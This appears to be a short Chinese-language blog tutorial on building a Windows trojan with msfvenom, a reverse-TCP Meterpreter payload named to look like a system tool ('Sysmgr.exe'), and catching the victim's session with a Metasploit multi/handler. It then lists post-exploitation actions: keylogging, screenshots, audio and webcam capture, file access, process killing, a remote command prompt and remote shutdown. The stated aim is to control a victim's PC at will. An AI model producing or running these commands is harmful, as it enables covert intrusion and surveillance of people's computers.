在一些关于黑客题材的电影中,我们会看到某个大型组织的工作人员把捡来的优盘插入主机点击几下导致整个组织的电脑或电力系统等其他设备被控制的场景。接下来,我们将学习如何生成木马、执行漏洞利用并根据自己的意愿控制受害者 PC。再说句废话,技术应该开放和自由,行为也需要规范。
生成木马
执行以下命令生成木马并发送给受害者。
1
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f exe -o Sysmgr.exe
|
执行漏洞利用
接下来执行以下命令进行漏洞利用,在受害者的 Windows 中打开木马时,我们将会收到一个会话,下一步就可以用命令控制受害者的 PC 了。
1
2
3
4
5
6
| msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 4444
exploit
|
查看系统信息
鼠标
键盘
1.键盘事件
2.开始键盘记录
3.查看键盘记录
4.停止键盘记录
截图
打开远程屏幕
或
录音
默认录制时长为1s,以下指定为13s,时间长了会报错。
摄像头
1.列出摄像头
2.拍摄
3.播放视频流
查看文件
执行程序
执行以下命令,在受害者的 PC 上打开命令提示符。
进程
1.查看进程
2.终止进程
3.按名称终止进程,同一个名称会有多个进程。
打开命令提示符
在我们的 PC 上打开受害者的命令提示符。
关闭远程计算机